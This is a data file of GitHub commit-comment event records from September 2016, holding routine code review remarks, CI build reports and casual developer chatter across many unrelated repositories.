{"id":"4629293705","type":"CommitCommentEvent","actor":{"login":"Alhadis"},"repo":{"name":"Alhadis/REST-GreenWalk"},"payload":{"comment":{"id":19204150,"position":null,"line":null,"path":null,"commit_id":"5c1147729966b76ea4fb92813cde3f9f48052229","created_at":"2016-09-28T08:47:49Z","updated_at":"2016-09-28T08:47:49Z","body":"Ah right, thanks. I've directed GitHub support to this; I'm starting to think it's a bug with the site. The raw commit itself has *no* date-related info pointing to the original/unsynthesised date..."}},"created_at":"2016-09-28T08:47:49Z"}
{"id":"4629294388","type":"CommitCommentEvent","actor":{"login":"furzeface"},"repo":{"name":"gbbns/gbbns.github.io"},"payload":{"comment":{"id":19204152,"position":6,"line":11,"path":"_sass/_components/_component.navigation-primary.scss","commit_id":"040a675e7f9077620258440c19cabff55987fdc4","created_at":"2016-09-28T08:47:57Z","updated_at":"2016-09-28T08:47:57Z","body":"Nice, I love removing things like `remy( )` - makes sense."}},"created_at":"2016-09-28T08:47:57Z"}
{"id":"4629296444","type":"CommitCommentEvent","actor":{"login":"smowton"},"repo":{"name":"cristina-david/cbmc"},"payload":{"comment":{"id":19204156,"position":91,"line":1322,"path":"src/test_gen/java_test_source_factory.cpp","commit_id":"43b94e06fae9c63f38a929a792326a259380d778","created_at":"2016-09-28T08:48:21Z","updated_at":"2016-09-28T08:48:21Z","body":"Floating point conversion is passed through to `expr2c` from `expr2java` but again should do what you need; all these cases over types can be eliminated"}},"created_at":"2016-09-28T08:48:21Z"}
{"id":"4629297641","type":"CommitCommentEvent","actor":{"login":"furzeface"},"repo":{"name":"gbbns/gbbns.github.io"},"payload":{"comment":{"id":19204160,"position":null,"line":null,"path":null,"commit_id":"040a675e7f9077620258440c19cabff55987fdc4","created_at":"2016-09-28T08:48:36Z","updated_at":"2016-09-28T08:48:36Z","body":":octocat: :shipit: "}},"created_at":"2016-09-28T08:48:36Z"}
{"id":"4629298274","type":"CommitCommentEvent","actor":{"login":"piecioshka"},"repo":{"name":"lubieciastka/bomberman-temp"},"payload":{"comment":{"id":19204161,"position":null,"line":null,"path":null,"commit_id":"ca5cc4c83de9116c4073d8d10d72df40e8bfb9ca","created_at":"2016-09-28T08:48:44Z","updated_at":"2016-09-28T08:48:44Z","body":"3 różne maile - 3 różne konta. Mistrz.\r\nOj Kuba, Kuba, po co taki stan rzeczy? 😅\r\n@rendfall możesz się od kolegi uczyć :) "}},"created_at":"2016-09-28T08:48:44Z"}
{"id":"4629305741","type":"CommitCommentEvent","actor":{"login":"trombik"},"repo":{"name":"reallyenglish/ansible-role-root"},"payload":{"comment":{"id":19204174,"position":23,"line":22,"path":"test/serverspec/default_spec.rb","commit_id":"8d4f27705dea04ea0111a14789f43c5a064ffee9","created_at":"2016-09-28T08:50:13Z","updated_at":"2016-09-28T08:50:13Z","body":"needs fix"}},"created_at":"2016-09-28T08:50:13Z"}
{"id":"4629306725","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19204178,"position":null,"line":null,"path":null,"commit_id":"6b40ebbb7e9f3925c12b1159ef09c5d163807532","created_at":"2016-09-28T08:50:25Z","updated_at":"2016-09-28T08:50:25Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1185](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14439&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 260, ignored: 3 Build time: 00:11:03"}},"created_at":"2016-09-28T08:50:25Z"}
{"id":"4629310309","type":"CommitCommentEvent","actor":{"login":"theute"},"repo":{"name":"hawkular/hawkular-metrics"},"payload":{"comment":{"id":19204186,"position":null,"line":null,"path":null,"commit_id":"5a3099e6f8db6b0eb0d16b655ae75c7a5b0ddfb1","created_at":"2016-09-28T08:51:07Z","updated_at":"2016-09-28T08:51:07Z","body":"Don't we have a dependency circle problem here ?\r\nI see that this (hawkular-metrics-0.20.0-SNAPSHOT) depends on hawkular-alerts-1.2.0 but hawkular alerts-1.2.0 depends on hawkular-metrics-0.19.0"}},"created_at":"2016-09-28T08:51:07Z"}
{"id":"4629313077","type":"CommitCommentEvent","actor":{"login":"Rondom"},"repo":{"name":"dokan-dev/dokany"},"payload":{"comment":{"id":19204193,"position":null,"line":null,"path":null,"commit_id":"3361dbf7e681d45d71753b2931967e0bd700e492","created_at":"2016-09-28T08:51:38Z","updated_at":"2016-09-28T08:51:38Z","body":"As I said, maybe stick with the current numbering until 1.0.1 is released and reset right after 1.0.1\r\n\r\nAppveyor offers a GitHub integration that may be used to simplify the permissions, but maybe this means that it must be moved from Maxhy to dokan-dev organisation, I am not sure.\r\n\r\nhttps://www.appveyor.com/docs/team-setup/"}},"created_at":"2016-09-28T08:51:38Z"}
{"id":"4629313942","type":"CommitCommentEvent","actor":{"login":"ERaBala"},"repo":{"name":"ERaBala/SwiftLearing"},"payload":{"comment":{"id":19204194,"position":null,"line":null,"path":null,"commit_id":"4b2daadca1777bf48a0108c9c7d66aed847cbf74","created_at":"2016-09-28T08:51:49Z","updated_at":"2016-09-28T08:51:49Z","body":"Calendar Control"}},"created_at":"2016-09-28T08:51:49Z"}
{"id":"4629315914","type":"CommitCommentEvent","actor":{"login":"abompard"},"repo":{"name":"falconry/falcon"},"payload":{"comment":{"id":19204198,"position":null,"line":null,"path":null,"commit_id":"da0eec2e42fa2e0319ec446446dde55a0c3c828f","created_at":"2016-09-28T08:52:11Z","updated_at":"2016-09-28T08:52:11Z","body":"Could you also allow the `DELETE` method to parse form parameters?"}},"created_at":"2016-09-28T08:52:11Z"}
{"id":"4629323290","type":"CommitCommentEvent","actor":{"login":"yitang"},"repo":{"name":"JamesRamm/MapPIG"},"payload":{"comment":{"id":19204204,"position":5,"line":5,"path":"src/map_control.js","commit_id":"77507b9c498ffeb654d5b63125950c4e50ba1ca2","created_at":"2016-09-28T08:53:39Z","updated_at":"2016-09-28T08:53:39Z","body":"wow, you removed all `;`, does it still work? "}},"created_at":"2016-09-28T08:53:39Z"}
{"id":"4629326074","type":"CommitCommentEvent","actor":{"login":"yitang"},"repo":{"name":"JamesRamm/MapPIG"},"payload":{"comment":{"id":19204212,"position":null,"line":null,"path":null,"commit_id":"77507b9c498ffeb654d5b63125950c4e50ba1ca2","created_at":"2016-09-28T08:54:11Z","updated_at":"2016-09-28T08:54:11Z","body":"Yo, I am reviewing the code on GitHub, it's epic! \r\n"}},"created_at":"2016-09-28T08:54:11Z"}
{"id":"4629328349","type":"CommitCommentEvent","actor":{"login":"lubieciastka"},"repo":{"name":"lubieciastka/bomberman-temp"},"payload":{"comment":{"id":19204217,"position":null,"line":null,"path":null,"commit_id":"ca5cc4c83de9116c4073d8d10d72df40e8bfb9ca","created_at":"2016-09-28T08:54:34Z","updated_at":"2016-09-28T08:54:34Z","body":"Oj Piotrze, Piotrze, a co to za CSI github ?  :D"}},"created_at":"2016-09-28T08:54:34Z"}
{"id":"4629329152","type":"CommitCommentEvent","actor":{"login":"sergeylaptev"},"repo":{"name":"BrandyMint/kiosk-public-static-v2"},"payload":{"comment":{"id":19204219,"position":11,"line":14,"path":"app/scripts/react/components/Pagination/Pagination.jsx","commit_id":"32cd2dbccd239a1aa21455365b9fb384971170d8","created_at":"2016-09-28T08:54:42Z","updated_at":"2016-09-28T08:54:42Z","body":"```js\r\nconst href = envPick({\r\n  client: () => window.location.href,\r\n  server: () => this.props.currentHref,\r\n});\r\n```"}},"created_at":"2016-09-28T08:54:42Z"}
{"id":"4629334412","type":"CommitCommentEvent","actor":{"login":"iamgoangle"},"repo":{"name":"pongsakornsemsuwan/brownbox"},"payload":{"comment":{"id":19204229,"position":16,"line":32,"path":"app/server/server.js","commit_id":"7ebbab528e3db1d98279f9da6c332dc35966166b","created_at":"2016-09-28T08:55:37Z","updated_at":"2016-09-28T08:55:37Z","body":"I got a problem with my project Today. Mongoose thrown an warning message like \r\n\r\n\"(node:13648) DeprecationWarning: Mongoose: mpromise (mongoose's default promise library) is deprecated, plug in your own promise library instead: http://mongoos ejs.com/docs/promises.html'\r\n\r\nI have fixed by adding\r\n\r\nmongoose.Promise = global.Promise"}},"created_at":"2016-09-28T08:55:37Z"}
{"id":"4629335678","type":"CommitCommentEvent","actor":{"login":"nwhetsell"},"repo":{"name":"csound/csound"},"payload":{"comment":{"id":19204230,"position":null,"line":null,"path":null,"commit_id":"710ef8d20562a9bb9eab319f4a203e9bbe1ad092","created_at":"2016-09-28T08:55:49Z","updated_at":"2016-09-28T08:55:49Z","body":"@jpffitch It may be a good idea to make a similar change in [csound_sco.lex](https://github.com/csound/csound/blob/33734490503b76653ab85a236e4559fe9019bfc9/Engine/csound_sco.lex#L64)."}},"created_at":"2016-09-28T08:55:49Z"}
{"id":"4629339373","type":"CommitCommentEvent","actor":{"login":"mmusgrov"},"repo":{"name":"mmusgrov/narayana"},"payload":{"comment":{"id":19204238,"position":5,"line":106,"path":"ArjunaJTS/idl/idlj-j9/pom.xml","commit_id":"4620d5895ae47ec85ea0d8e9ca157022992c4420","created_at":"2016-09-28T08:56:29Z","updated_at":"2016-09-28T08:56:29Z","body":"instead of a new line use two <jvmarg value=xxx\" lines, ie\r\n<jvmarg value=\"--add-exports\"/>\r\n<jvmarg value=\"java.corba/com.sun.tools.corba.se.idl.toJavaPortable=ALL-UNNAMED\"/>\r\n\r\netc\r\n"}},"created_at":"2016-09-28T08:56:29Z"}
{"id":"4629340253","type":"CommitCommentEvent","actor":{"login":"piecioshka"},"repo":{"name":"lubieciastka/bomberman-temp"},"payload":{"comment":{"id":19204240,"position":null,"line":null,"path":null,"commit_id":"ca5cc4c83de9116c4073d8d10d72df40e8bfb9ca","created_at":"2016-09-28T08:56:38Z","updated_at":"2016-09-28T08:56:38Z","body":"GitHub to taki mój portal społecznościowy 😄 "}},"created_at":"2016-09-28T08:56:38Z"}
{"id":"4629344728","type":"CommitCommentEvent","actor":{"login":"JamesRamm"},"repo":{"name":"JamesRamm/MapPIG"},"payload":{"comment":{"id":19204248,"position":5,"line":5,"path":"src/map_control.js","commit_id":"77507b9c498ffeb654d5b63125950c4e50ba1ca2","created_at":"2016-09-28T08:57:25Z","updated_at":"2016-09-28T08:57:25Z","body":"yeah - ES6 doesnt require semicolon at the end of lines.\r\nNot all browsers support it yet (major ones do though I think), but this isnt running in a 'browser' but electron, so no need to consider that"}},"created_at":"2016-09-28T08:57:25Z"}
{"id":"4629349044","type":"CommitCommentEvent","actor":{"login":"JamesRamm"},"repo":{"name":"JamesRamm/MapPIG"},"payload":{"comment":{"id":19204257,"position":null,"line":null,"path":null,"commit_id":"77507b9c498ffeb654d5b63125950c4e50ba1ca2","created_at":"2016-09-28T08:58:11Z","updated_at":"2016-09-28T08:58:11Z","body":"ha yes it is...github is lovely..."}},"created_at":"2016-09-28T08:58:11Z"}
{"id":"4629350105","type":"CommitCommentEvent","actor":{"login":"goodbytes23"},"repo":{"name":"moleisking/SAM"},"payload":{"comment":{"id":19204258,"position":null,"line":null,"path":null,"commit_id":"4b748139fce911da21abbf4dede080d0f6f0e9d9","created_at":"2016-09-28T08:58:24Z","updated_at":"2016-09-28T08:58:24Z","body":"Yep, for sure, but not on the registration page, right?"}},"created_at":"2016-09-28T08:58:24Z"}
{"id":"4629351141","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19204261,"position":null,"line":null,"path":null,"commit_id":"8a6c19b968c4e61b4b79e59bdb4f8c5745502c1a","created_at":"2016-09-28T08:58:35Z","updated_at":"2016-09-28T08:58:35Z","body":"ENERGYPLUS_EXPECTED_HASH (evanweaver) - Win64-Windows-7-VisualStudio-12: OK (2410 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-8a6c19b968c4e61b4b79e59bdb4f8c5745502c1a-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-8a6c19b968c4e61b4b79e59bdb4f8c5745502c1a-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-98.45%25-yellow.svg)</a> \n"}},"created_at":"2016-09-28T08:58:35Z"}
{"id":"4629354036","type":"CommitCommentEvent","actor":{"login":"moeller0"},"repo":{"name":"dtaht/sch_cake"},"payload":{"comment":{"id":19204270,"position":null,"line":null,"path":null,"commit_id":"669e5b8bf3a4593261898dcd035359fd29105bbd","created_at":"2016-09-28T08:59:08Z","updated_at":"2016-09-28T08:59:08Z","body":"I believe that the PTM adjustment could be handeled completey by tc, simply multiply the specified rate by 64/65 and be done with."}},"created_at":"2016-09-28T08:59:08Z"}
{"id":"4629356285","type":"CommitCommentEvent","actor":{"login":"boryas"},"repo":{"name":"boryas/hcppd"},"payload":{"comment":{"id":19204276,"position":null,"line":null,"path":null,"commit_id":"dcc3b5434df3605d2449e3edcd5d18c1b289d10e","created_at":"2016-09-28T08:59:33Z","updated_at":"2016-09-28T08:59:33Z","body":"#11 "}},"created_at":"2016-09-28T08:59:33Z"}
{"id":"4629358817","type":"CommitCommentEvent","actor":{"login":"UsakinKageru"},"repo":{"name":"UsakinKageru/Jemangedeschips"},"payload":{"comment":{"id":19204287,"position":null,"line":null,"path":null,"commit_id":"c433c909ba291dd8acba4cb8e532ac5f3da96c88","created_at":"2016-09-28T09:00:05Z","updated_at":"2016-09-28T09:00:05Z","body":"-m miam"}},"created_at":"2016-09-28T09:00:05Z"}
{"id":"4629359474","type":"CommitCommentEvent","actor":{"login":"shansdbz"},"repo":{"name":"iH8sn0w/iBoot32Patcher"},"payload":{"comment":{"id":19204291,"position":null,"line":null,"path":null,"commit_id":"eaad0459af73ddc268700ab4420127293b7dd583","created_at":"2016-09-28T09:00:12Z","updated_at":"2016-09-28T09:00:12Z","body":"how to jailbreak this explain me please"}},"created_at":"2016-09-28T09:00:12Z"}
{"id":"4629360675","type":"CommitCommentEvent","actor":{"login":"Airborn22"},"repo":{"name":"Airborn22/vakvarju"},"payload":{"comment":{"id":19204296,"position":null,"line":null,"path":null,"commit_id":"95eb1cebeddb484d31dc4338917a1c66155ae3a6","created_at":"2016-09-28T09:00:25Z","updated_at":"2016-09-28T09:00:25Z","body":"![Szeptember 28. - Szerda](http://ujlipot.vakvarju.com/data/napimenu/22.jpg?v=1474636281)\nTyúkhúsleves májgaluskával\r\nBácskai rizseshús csemegeuborkával\r\nCsokoládés piskótatekercs"}},"created_at":"2016-09-28T09:00:25Z"}
{"id":"4629363107","type":"CommitCommentEvent","actor":{"login":"guangyongzhang"},"repo":{"name":"guangyongzhang/soulgarden"},"payload":{"comment":{"id":19204306,"position":5,"line":3,"path":"README.md","commit_id":"bc3208a56c0579e19c0c5a04fe836e38c8b683aa","created_at":"2016-09-28T09:00:52Z","updated_at":"2016-09-28T09:00:52Z","body":"I love you!"}},"created_at":"2016-09-28T09:00:52Z"}
{"id":"4629364182","type":"CommitCommentEvent","actor":{"login":"shansdbz"},"repo":{"name":"iH8sn0w/iBoot32Patcher"},"payload":{"comment":{"id":19204310,"position":null,"line":null,"path":null,"commit_id":"8b0e02e7f9884369659a9374c81e4b89b8c3dd0b","created_at":"2016-09-28T09:01:03Z","updated_at":"2016-09-28T09:01:03Z","body":"how to jailbreak please explain  me"}},"created_at":"2016-09-28T09:01:03Z"}
{"id":"4629364675","type":"CommitCommentEvent","actor":{"login":"nyalldawson"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":19204312,"position":null,"line":null,"path":null,"commit_id":"89d4998510bccbf7817671171c25cf71deab6f9a","created_at":"2016-09-28T09:01:09Z","updated_at":"2016-09-28T09:01:09Z","body":"Yes, this was blacklisted from Travis (not removed from QGIS!) a while back. Situation was that a bunch of these tests were regularly but randomly failing and we'd see many PRs fail because of this. It was causing frustration with new contributors who were struggling to understand why their work was causing issues. It's a tough call but if Travis can't be relied upon to only flag valid errors then people start ignoring it and pushing broken code.\n\nRe announcing it publicly - that's what the commit message was for ;) but I guess not everyone tracks master close enough to catch every commit, so in retrospect a dev list announcement should have been made.\n\nI'll ping you next time this fails on Travis (if it's not been resolved by other changes in the meantime) for you to look into."}},"created_at":"2016-09-28T09:01:09Z"}
{"id":"4629367289","type":"CommitCommentEvent","actor":{"login":"jjudea"},"repo":{"name":"jjudea/jja_training"},"payload":{"comment":{"id":19204320,"position":null,"line":null,"path":null,"commit_id":"065b010537659b054c6f4a64bc455f2107764673","created_at":"2016-09-28T09:01:39Z","updated_at":"2016-09-28T09:01:39Z","body":"ok"}},"created_at":"2016-09-28T09:01:39Z"}
{"id":"4629367788","type":"CommitCommentEvent","actor":{"login":"midenok"},"repo":{"name":"natsys/mariadb_10.2"},"payload":{"comment":{"id":19204321,"position":null,"line":null,"path":null,"commit_id":"19404059372ebb726090b8749542eb5a341da1bf","created_at":"2016-09-28T09:01:45Z","updated_at":"2016-09-28T09:01:45Z","body":"This fails in trunk. I'm looking into it."}},"created_at":"2016-09-28T09:01:45Z"}
{"id":"4629369540","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19204323,"position":null,"line":null,"path":null,"commit_id":"6f9687221220804678df8fb124ce3ff22815fc11","created_at":"2016-09-28T09:02:06Z","updated_at":"2016-09-28T09:02:06Z","body":"MakeWebKitWork (kbenne) - i386-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6f9687221220804678df8fb124ce3ff22815fc11-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6f9687221220804678df8fb124ce3ff22815fc11-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-28T09:02:06Z"}
{"id":"4629372161","type":"CommitCommentEvent","actor":{"login":"HridayHS"},"repo":{"name":"Cosmic-OS/android_frameworks_opt_telephony"},"payload":{"comment":{"id":19204332,"position":null,"line":null,"path":null,"commit_id":"f2759904ed1e77d43ad6383315b20b944aadb883","created_at":"2016-09-28T09:02:38Z","updated_at":"2016-09-28T09:02:38Z","body":":v"}},"created_at":"2016-09-28T09:02:38Z"}
{"id":"4629372610","type":"CommitCommentEvent","actor":{"login":"shansdbz"},"repo":{"name":"iH8sn0w/iBoot32Patcher"},"payload":{"comment":{"id":19204333,"position":null,"line":null,"path":null,"commit_id":"1ecef2fb93dcb38527c25c734691939b71e0a42f","created_at":"2016-09-28T09:02:43Z","updated_at":"2016-09-28T09:02:43Z","body":"how to jailbreak iOS 10 please explain me"}},"created_at":"2016-09-28T09:02:43Z"}
{"id":"4629373136","type":"CommitCommentEvent","actor":{"login":"wlw565"},"repo":{"name":"wlw565/first-test"},"payload":{"comment":{"id":19204335,"position":null,"line":null,"path":null,"commit_id":"41e96870112d7115523c24dbabef9773704f44f1","created_at":"2016-09-28T09:02:48Z","updated_at":"2016-09-28T09:02:48Z","body":"ssas"}},"created_at":"2016-09-28T09:02:48Z"}
{"id":"4629373342","type":"CommitCommentEvent","actor":{"login":"jpffitch"},"repo":{"name":"csound/csound"},"payload":{"comment":{"id":19204336,"position":null,"line":null,"path":null,"commit_id":"710ef8d20562a9bb9eab319f4a203e9bbe1ad092","created_at":"2016-09-28T09:02:51Z","updated_at":"2016-09-28T09:02:51Z","body":"csodso.lex s not used and may never be\n\nOn Wed, 28 Sep 2016, Nate Whetsell wrote:\n\n> \n> @jpffitch It may be a good idea to make a similar change in csound_sco.lex.\n> \n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub, or mute the\n> thread.[AELNQtj1hJy3O6w94inoQDkpp_f7nLi4ks5quiuXgaJpZM4KIkem.gif]\n> \n> \n>"}},"created_at":"2016-09-28T09:02:51Z"}
{"id":"4629373626","type":"CommitCommentEvent","actor":{"login":"sedwards2009"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19204337,"position":143,"line":668,"path":"cura/Settings/MachineManager.py","commit_id":"4bb6ddaf28ae2f5a93d59d25fa479d594aff1d5c","created_at":"2016-09-28T09:02:53Z","updated_at":"2016-09-28T09:02:53Z","body":"I think I got that one already."}},"created_at":"2016-09-28T09:02:53Z"}
{"id":"4629373864","type":"CommitCommentEvent","actor":{"login":"tjlee"},"repo":{"name":"tjlee/db-env"},"payload":{"comment":{"id":19204339,"position":null,"line":null,"path":null,"commit_id":"7bfffc86c6816ebefd933e2b504edfef7b600286","created_at":"2016-09-28T09:02:56Z","updated_at":"2016-09-28T09:02:56Z","body":"added `version: '2'` and put everything under `services` tag with additional tab indention"}},"created_at":"2016-09-28T09:02:56Z"}
{"id":"4629373958","type":"CommitCommentEvent","actor":{"login":"nyalldawson"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":19204340,"position":null,"line":null,"path":null,"commit_id":"89d4998510bccbf7817671171c25cf71deab6f9a","created_at":"2016-09-28T09:02:57Z","updated_at":"2016-09-28T09:02:57Z","body":"Re server scripts - happy for you to make the call, but standardising on one would be much appreciated! Can we move it from port 8081 to something less commonly used, or better yet to have it auto select a free port?"}},"created_at":"2016-09-28T09:02:57Z"}
{"id":"4629375622","type":"CommitCommentEvent","actor":{"login":"shansdbz"},"repo":{"name":"iH8sn0w/iBoot32Patcher"},"payload":{"comment":{"id":19204342,"position":null,"line":null,"path":null,"commit_id":"818c6f503516363beee64493b9712400b23a1653","created_at":"2016-09-28T09:03:18Z","updated_at":"2016-09-28T09:03:18Z","body":"how to jailbreak please explain me"}},"created_at":"2016-09-28T09:03:18Z"}
{"id":"4629376138","type":"CommitCommentEvent","actor":{"login":"wlw565"},"repo":{"name":"wlw565/first-test"},"payload":{"comment":{"id":19204346,"position":2,"line":2,"path":"README.md","commit_id":"41e96870112d7115523c24dbabef9773704f44f1","created_at":"2016-09-28T09:03:22Z","updated_at":"2016-09-28T09:03:22Z","body":"abdefa"}},"created_at":"2016-09-28T09:03:22Z"}
{"id":"4629376596","type":"CommitCommentEvent","actor":{"login":"sedwards2009"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19204347,"position":157,"line":682,"path":"cura/Settings/MachineManager.py","commit_id":"4bb6ddaf28ae2f5a93d59d25fa479d594aff1d5c","created_at":"2016-09-28T09:03:28Z","updated_at":"2016-09-28T09:03:28Z","body":"I'm open to suggestions..."}},"created_at":"2016-09-28T09:03:28Z"}
{"id":"4629378560","type":"CommitCommentEvent","actor":{"login":"MatthiasHertel"},"repo":{"name":"humhub/humhub-modules-custom-pages"},"payload":{"comment":{"id":19204352,"position":null,"line":null,"path":null,"commit_id":"b2bff948725aaa0cd98456c67e7560b0cb98ca5e","created_at":"2016-09-28T09:03:52Z","updated_at":"2016-09-28T09:03:52Z","body":"first of all thanks for the fast reply\r\n\r\ncan u test it ? it would be a nice enhancement for me ... but i dont understand enough the whole humhub routing  otherwise i would test it on my own"}},"created_at":"2016-09-28T09:03:52Z"}
{"id":"4629379085","type":"CommitCommentEvent","actor":{"login":"toxa-ak88"},"repo":{"name":"Adam198590/JavaSerializatorProj"},"payload":{"comment":{"id":19204353,"position":46,"line":53,"path":"src/main/java/util/ByteUtil.java","commit_id":"7497e501c2ed2abdfc18a1979e316c1e419f5352","created_at":"2016-09-28T09:03:58Z","updated_at":"2016-09-28T09:03:58Z","body":"Here you can get `BufferUnderflowException` or wrong result as you read package id twice:\r\n - getPacketTypeFromByteBuffer(src); read 4 bytes of `package id` and moves buffer position to 4\r\n - loginPacket.deserialize(src); tries to read 4bytes of `package id` from position 4 but there is `string.length` serialized"}},"created_at":"2016-09-28T09:03:58Z"}
{"id":"4629381034","type":"CommitCommentEvent","actor":{"login":"moeller0"},"repo":{"name":"dtaht/sch_cake"},"payload":{"comment":{"id":19204359,"position":null,"line":null,"path":null,"commit_id":"669e5b8bf3a4593261898dcd035359fd29105bbd","created_at":"2016-09-28T09:04:19Z","updated_at":"2016-09-28T09:04:19Z","body":"The following comment:\r\n\"+\t\t// the actual overhead is 1 bit per 64-bit block\r\n +\t\t// the following adds one byte per 64 bytes or part thereof\"\r\n\r\nDoes seem to be in opposition to the relevant standard: ITU G992-3 Annex N which states:\r\n\"The PTM-TC then performs 64/65-octet encapsulation on the frame\"\r\n\r\nThe standard also always talks about octets not bits... So expressing this as 64/65 bits seems unusual and might justify a longer comment if true."}},"created_at":"2016-09-28T09:04:19Z"}
{"id":"4629382031","type":"CommitCommentEvent","actor":{"login":"l2fprod"},"repo":{"name":"IBM-Bluemix/logistics-wizard-toolchain"},"payload":{"comment":{"id":19204367,"position":19,"line":106,"path":".bluemix/controller.pipeline.yml","commit_id":"7c8bde4cd6fff9c8895db9c2d3845010ede8e21a","created_at":"2016-09-28T09:04:31Z","updated_at":"2016-09-28T09:04:31Z","body":"actually all this should not be needed. It looks like the controller is not using the service discovery \"cf set-env ${CF_APP_NAME} SD_STATUS OFF\" but instead uses ERP_SERVICE.\r\n\r\nWe should turn the SD_STATUS flag to ON. This way we don't need to pass the ERP_SERVICE location anymore as the lookup will be done in the service discovery service.\r\n\r\nThe only place where we would still need to pass the ERP_SERVICE location is in DEV_TEST for the integration tests but even there it sounds broken to have to this - specially because of https://github.com/IBM-Bluemix/logistics-wizard-toolchain/issues/15.\r\n\r\nAnd in the webui as it is not using the service discovery yet.\r\n\r\nBasically all this calls for a simplification of the build pipeline scripts."}},"created_at":"2016-09-28T09:04:31Z"}
{"id":"4629384069","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19204370,"position":null,"line":null,"path":null,"commit_id":"6f9687221220804678df8fb124ce3ff22815fc11","created_at":"2016-09-28T09:04:55Z","updated_at":"2016-09-28T09:04:55Z","body":"MakeWebKitWork (kbenne) - Win64-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6f9687221220804678df8fb124ce3ff22815fc11-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6f9687221220804678df8fb124ce3ff22815fc11-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-28T09:04:55Z"}
{"id":"4629384724","type":"CommitCommentEvent","actor":{"login":"latobarita"},"repo":{"name":"stellar/stellar-core"},"payload":{"comment":{"id":19204374,"position":null,"line":null,"path":null,"commit_id":"bff068c1cb6507e480cd7f473c352a3877626b03","created_at":"2016-09-28T09:05:02Z","updated_at":"2016-09-28T09:05:02Z","body":"some tests failed:\nfailure: https://travis-ci.org/stellar/stellar-core/builds/163336339\n"}},"created_at":"2016-09-28T09:05:02Z"}
{"id":"4629385854","type":"CommitCommentEvent","actor":{"login":"jh-bate"},"repo":{"name":"tidepool-org/viz"},"payload":{"comment":{"id":19204378,"position":null,"line":null,"path":null,"commit_id":"29528100161ff61cd59eff8f4398dd0178fbd063","created_at":"2016-09-28T09:05:15Z","updated_at":"2016-09-28T09:05:15Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [<ux: 1 dev:5 tst: 1> [blip] [device settings] Update design for Tandem pump Device Settings](https://trello.com/c/tbc9evMS/3-ux-1-dev-5-tst-1-blip-device-settings-update-design-for-tandem-pump-device-settings)"}},"created_at":"2016-09-28T09:05:15Z"}
{"id":"4629386735","type":"CommitCommentEvent","actor":{"login":"rubensayshi"},"repo":{"name":"php-build/php-build"},"payload":{"comment":{"id":19204380,"position":null,"line":null,"path":null,"commit_id":"ee8b8b7173607c6e491425e39f106aecab339e37","created_at":"2016-09-28T09:05:25Z","updated_at":"2016-09-28T09:05:25Z","body":"[2016-01-25] - Xdebug 2.4.0RC4 is out!\r\nThis is the fourth and hopefully last release candidate of the 2.4 series. The 2.4 series adds support for PHP 7 and is in large parts a rewrite of the earlier code base to support PHP 5.4 through PHP 7.0. This release candidate fixes among others, a bunch of crashes, and adds support for PHP 7.1."}},"created_at":"2016-09-28T09:05:25Z"}
{"id":"4629389214","type":"CommitCommentEvent","actor":{"login":"jh-bate"},"repo":{"name":"tidepool-org/blip"},"payload":{"comment":{"id":19204387,"position":null,"line":null,"path":null,"commit_id":"7b678e173be92d7ce039d07a3f82a91db0cbed2a","created_at":"2016-09-28T09:05:57Z","updated_at":"2016-09-28T09:05:57Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [<ux: 1 dev:5 tst: 1> [blip] [device settings] Update design for Tandem pump Device Settings](https://trello.com/c/tbc9evMS/3-ux-1-dev-5-tst-1-blip-device-settings-update-design-for-tandem-pump-device-settings)"}},"created_at":"2016-09-28T09:05:57Z"}
{"id":"4629389883","type":"CommitCommentEvent","actor":{"login":"balessan"},"repo":{"name":"assemblee-virtuelle/wpldp"},"payload":{"comment":{"id":19204389,"position":null,"line":null,"path":null,"commit_id":"e4b60168b29753ea13c0224c3dafd0f658955e6c","created_at":"2016-09-28T09:06:04Z","updated_at":"2016-09-28T09:06:04Z","body":"Wooooo, tu viens de m'exploser le cerveau avec:\r\n\r\n`window[displayFunction].call(window,'#detail', resourceIri, templateConcept);`\r\n\r\nEnfin, c'est logique que ça fonctionne :-D\r\nJ'approuve le reste :-)"}},"created_at":"2016-09-28T09:06:04Z"}
